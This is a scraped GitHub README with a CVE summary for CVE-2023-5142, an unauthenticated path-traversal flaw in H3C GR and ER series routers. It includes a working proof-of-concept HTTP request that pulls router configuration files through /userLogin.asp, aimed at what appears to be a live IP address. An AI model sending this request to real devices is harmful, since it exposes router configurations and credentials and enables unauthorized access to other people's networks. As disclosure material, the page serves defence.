Headline
CVE-2023-5142: GitHub - yinsel/CVE-H3C-Report: H3C GR series router system management has unauthorized access vulnerability
A vulnerability classified as problematic was found in H3C GR-1100-P, GR-1108-P, GR-1200W, GR-1800AX, GR-2200, GR-3200, GR-5200, GR-8300, ER2100n, ER2200G2, ER3200G2, ER3260G2, ER5100G2, ER5200G2 and ER6300G2 up to 20230908. This vulnerability affects unknown code of the file /userLogin.asp of the component Config File Handler. The manipulation leads to path traversal. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. VDB-240238 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
1 branch 0 tags
Code
Use Git or checkout with SVN using the web URL.
Open with GitHub Desktop
Download ZIP
Latest commit
FilesPermalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
H3C GR series router system management has unauthorized access vulnerability
Product: GR series router
version: all
rating: high-risk
website: http://www.h3c.com/
Hazards: Attackers can exploit this vulnerability to obtain sensitive information from routers by constructing special request packets to bypass identity verification.
principle: The router did not authenticate directory access and related files
exp:
Note: It is necessary to modify the file name suffix in POC, such as GR8300.cfg
GET /userLogin.asp/…/actionpolicy_status/…/GR1100-P.cfg HTTP/1.1 Host: 59.35.220.76:8989 Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close